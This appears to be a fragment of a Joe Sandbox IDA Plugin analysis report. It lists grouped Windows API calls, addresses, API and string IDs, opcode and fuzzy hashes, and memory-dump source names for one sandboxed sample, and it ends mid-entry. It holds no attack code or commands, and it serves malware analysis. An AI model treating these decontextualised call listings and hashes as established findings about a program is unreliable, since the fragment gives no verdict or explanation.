                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID: hW
                                                    • API String ID: 2864067406-1300829777
                                                    • Opcode ID: 583c3d4c9f932e906d9e41e344714cc91b7e04c26c92f64fe7c654a5baf3dc38
                                                    • Instruction ID: 48a66b4b109b13b234ec2e11acc6e3c638c0c971c14cb0382aa8767c074e5d74
                                                    • Opcode Fuzzy Hash: 583c3d4c9f932e906d9e41e344714cc91b7e04c26c92f64fe7c654a5baf3dc38
                                                    • Instruction Fuzzy Hash: 3D31A735910018EFCB15CF98D854EFA7BB6EB49320F04406AF905873A1C7356D61DF94
                                                    APIs
                                                      • Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
                                                      • Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
                                                      • Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006D6461
                                                    • LoadLibraryW.KERNEL32(?), ref: 006D6468
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006D647D
                                                    • DestroyWindow.USER32(?), ref: 006D6485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 102349ad2dee82a792ef2ea3128365d6ad7cc384872145159126417f32ba2ada
                                                    • Instruction ID: 310741ef8931bb9a00e43aae1740b951a07170c7db3bfcacef6bb8ac5a2eab45
                                                    • Opcode Fuzzy Hash: 102349ad2dee82a792ef2ea3128365d6ad7cc384872145159126417f32ba2ada
                                                    • Instruction Fuzzy Hash: D7215B71A00205AFEF104F64DC80EBB77EAEF59368F10962AFA50962A0D775DC5197A0
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006B6DBC
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006B6DEF
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006B6E01
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006B6E3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: e57b6157ab0f0d21248f70ebd671838a88a4bd0a109ce6d0bd4a89516fb4a09c
                                                    • Instruction ID: dbaf95bdec2d75017bff12bb2a68c03fa6173bc114e5787ed68b13f15d6c14c3
                                                    • Opcode Fuzzy Hash: e57b6157ab0f0d21248f70ebd671838a88a4bd0a109ce6d0bd4a89516fb4a09c
                                                    • Instruction Fuzzy Hash: D721A4B4600209ABDB209F69DC04ADA7BF6EF44720F204A29FCA1D73D0D774D991CB54
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 006B6E89
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006B6EBB
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 006B6ECC
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006B6F06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 0aa91fc3abeb3bcf584c04f064fa3fbfb592a5bb4bd8ae7e6c8015f37b393e37
                                                    • Instruction ID: ead6097a8585867a471caae604fec565eafbd201af9c678a0c6da6fcf14042eb
                                                    • Opcode Fuzzy Hash: 0aa91fc3abeb3bcf584c04f064fa3fbfb592a5bb4bd8ae7e6c8015f37b393e37
                                                    • Instruction Fuzzy Hash: 1221B0B95043059BDB209F69CC04AEA77AAEF45724F200A1AF9A1D33D0D774E9828B50
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BAC54
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006BACA8
                                                    • __swprintf.LIBCMT ref: 006BACC1
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,006DF910), ref: 006BACFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 9525cc05fff30d925a433032847e1a1ffad3a09b1f98c92eb8cb4612eeb8cb66
                                                    • Instruction ID: 5bb6c7f37663b68f5505f5a61ab29d1bf2f16ffd9289edcd10222380f26acbb1
                                                    • Opcode Fuzzy Hash: 9525cc05fff30d925a433032847e1a1ffad3a09b1f98c92eb8cb4612eeb8cb66
                                                    • Instruction Fuzzy Hash: E3217F70A00209EFCB50EFA4CD45DEE7BB9EF49715B0040A9F909AB351DB31EA45CB21
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B115F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B1184
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B118E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B11C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID: @k
                                                    • API String ID: 2875609808-3759510095
                                                    • Opcode ID: c286c54e598bc57f89b5ef8c70e71ebbda9e4303c202afc23f10f05f1f049ddd
                                                    • Instruction ID: 41471d99c2cfb2e182f7156e4f1173f454b6d934999cc0521711935974ae1ea0
                                                    • Opcode Fuzzy Hash: c286c54e598bc57f89b5ef8c70e71ebbda9e4303c202afc23f10f05f1f049ddd
                                                    • Instruction Fuzzy Hash: 0A118E71C0151CE7CF00DFA8D858AEEBB7AFF0A711F404066EA41BA240CB709590CBA5
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,007157B0,006DD809,000000FC,?,00000000,00000000,?,?,?,0068B969,?,?,?,?,?), ref: 006DACD1
                                                    • GetFocus.USER32 ref: 006DACD9
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • SendMessageW.USER32(00E1DB70,000000B0,000001BC,000001C0), ref: 006DAD4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 3601265619-4076565667
                                                    • Opcode ID: 00cd3739d8bd75765344266806593b0ba2eb8516cbb95245657244891f026036
                                                    • Instruction ID: 0d412d017c04c33c5eabbeab7667aceaf1500b78486825aa4a4c7d797dd23057
                                                    • Opcode Fuzzy Hash: 00cd3739d8bd75765344266806593b0ba2eb8516cbb95245657244891f026036
                                                    • Instruction Fuzzy Hash: D7014031A055009FC7159B28D898AE577E7EF8A321F18427EF826877F1DB31AC46CB51
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006CEC07
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006CEC37
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006CED6A
                                                    • CloseHandle.KERNEL32(?), ref: 006CEDEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 64240ba2d6a3f0dd14d842798266152940dd8ee6793d290f10cbe85a79335b34
                                                    • Instruction ID: 928578697a35558513d27db63c009204e4f74dba44821ee0db1f5cc95a6c5330
                                                    • Opcode Fuzzy Hash: 64240ba2d6a3f0dd14d842798266152940dd8ee6793d290f10cbe85a79335b34
                                                    • Instruction Fuzzy Hash: 008181716007009FD760EF28C846F6AB7E6EF84710F04891DF99A9B392D7B1AD44CB95
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D00FD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D013C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006D0183
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 006D01AF
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D01BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 8df480ef13e0e07c79b938d5870b8c242987ac34e01b01b2b4c0dd1fc0215256
                                                    • Instruction ID: e6ce171a7398db83596f0e761433a82bdfcd534c1931555a353b5da1dee99866
                                                    • Opcode Fuzzy Hash: 8df480ef13e0e07c79b938d5870b8c242987ac34e01b01b2b4c0dd1fc0215256
                                                    • Instruction Fuzzy Hash: 5C519F71608204AFD704EF64CC81F6AB7EAFF84304F04491EF856872A1DB31E909CB52
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006CD927
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006CD9AA
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 006CD9C6
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006CDA07
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006CDA21
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7896,?,?,00000000), ref: 00655A2C
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7896,?,?,00000000,?,?), ref: 00655A50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: fe45a327df7a5813ff96882460153cd474d14e793a8c0a59d81b5b58d470e5dc
                                                    • Instruction ID: 388c3d37ee277c7aab2d62b374fb6b89c6baa7c15cac344b3e8ddec1ae5b526b
                                                    • Opcode Fuzzy Hash: fe45a327df7a5813ff96882460153cd474d14e793a8c0a59d81b5b58d470e5dc
                                                    • Instruction Fuzzy Hash: 2A51F775A00209DFCB40EFA8C494EADB7F6EF09311F148069E856AB322D731ED46CB95
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006BE61F
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006BE648
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006BE687
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006BE6AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006BE6B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: d0768cd8bbfabc1eae20cf66b89d3bf0f44ba9eb7a43c6cf9db3697199694e62
                                                    • Instruction ID: 43774326664c38b1714eb9bcc15b9e7ed65f4f8473fbd582ece888ad341a1d88
                                                    • Opcode Fuzzy Hash: d0768cd8bbfabc1eae20cf66b89d3bf0f44ba9eb7a43c6cf9db3697199694e62
                                                    • Instruction Fuzzy Hash: 68516C35A00205DFCB40EF64C9819AEBBF6EF09310F1484A9E809AB361CB31ED44DF64
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00652357
                                                    • ScreenToClient.USER32(007157B0,?), ref: 00652374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00652399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 006523A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: 6ed3ac459774bfca951496a2c5250ec0dd715262cd7ab720915b97ab9a9e763f
                                                    • Instruction ID: 784255db81ae3cceeaa173076371639f4fd03524ccb32a3244ed56b35f40132b
                                                    • Opcode Fuzzy Hash: 6ed3ac459774bfca951496a2c5250ec0dd715262cd7ab720915b97ab9a9e763f
                                                    • Instruction Fuzzy Hash: 0441A235A04106FBCF259F68CC44AEDBB76FB06361F20435AF829922A0CB359D54DFA0
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A63E7
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 006A6433
                                                    • TranslateMessage.USER32(?), ref: 006A645C
                                                    • DispatchMessageW.USER32(?), ref: 006A6466
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A6475
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    • Opcode ID: 5008ca1517f35342b9d8acf150060cb5987d240f65da1c1ff767e3eec3c24677
                                                    • Instruction ID: 91816fd184a2cfbdf3c2d558be429647698ce6d8ab76cec181abf2b99f9978fe
                                                    • Opcode Fuzzy Hash: 5008ca1517f35342b9d8acf150060cb5987d240f65da1c1ff767e3eec3c24677
                                                    • Instruction Fuzzy Hash: 9831D471900646DFDB64AF74CC45BE67BEAEB06300F18C165F422C22A1E7399C49DF50
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 006A8A30
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 006A8ADA
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006A8AE2
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 006A8AF0
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006A8AF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 7c4966b7f5195afc720d70ef848ae333ff4fb1518e9f51deca35ab0721fd255d
                                                    • Instruction ID: d4f19e9d4dc015f5fb700bd204c447970f74269b6cdb5210fde858f054f7b90f
                                                    • Opcode Fuzzy Hash: 7c4966b7f5195afc720d70ef848ae333ff4fb1518e9f51deca35ab0721fd255d
                                                    • Instruction Fuzzy Hash: F831AD71900219EFDB14DFA8D94CADE7BB6EB05315F10822AFA25A72D1CBB09D14DF90
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DB192
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006DB1B7
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006DB1CF
                                                    • GetSystemMetrics.USER32(00000004), ref: 006DB1F8
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006C0E90,00000000), ref: 006DB216
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: ff3c2f4f00ec8326cf428c863fbc7f8e928c00effa9b6e0e5a8445bdf522a591
                                                    • Instruction ID: 04ae72fad1171a8a1be760ed72ac2d710941e7b98c11d3b963cb3ec66d6d0e0d
                                                    • Opcode Fuzzy Hash: ff3c2f4f00ec8326cf428c863fbc7f8e928c00effa9b6e0e5a8445bdf522a591
                                                    • Instruction Fuzzy Hash: 5421A031E10251EFCB149F39DC54AAA37A6FB45361F16573AB922C33E4D73099118B80
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 006C5A6E
                                                    • GetForegroundWindow.USER32 ref: 006C5A85
                                                    • GetDC.USER32(00000000), ref: 006C5AC1
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 006C5ACD
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 006C5B08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: ac69e5d614e658d550ca69413e910b0d70f76d32420a4e1e33cbe55812543617
                                                    • Instruction ID: ee8de1e031b9ab8f750f70e7072295967f563603192260ba4258493689959309
                                                    • Opcode Fuzzy Hash: ac69e5d614e658d550ca69413e910b0d70f76d32420a4e1e33cbe55812543617
                                                    • Instruction Fuzzy Hash: 54218475A01104AFD714EFA5DC84AAAB7E6EF48311F14C47DF80A97352CA70ED45CB54
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0065134D
                                                    • SelectObject.GDI32(?,00000000), ref: 0065135C
                                                    • BeginPath.GDI32(?), ref: 00651373
                                                    • SelectObject.GDI32(?,00000000), ref: 0065139C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
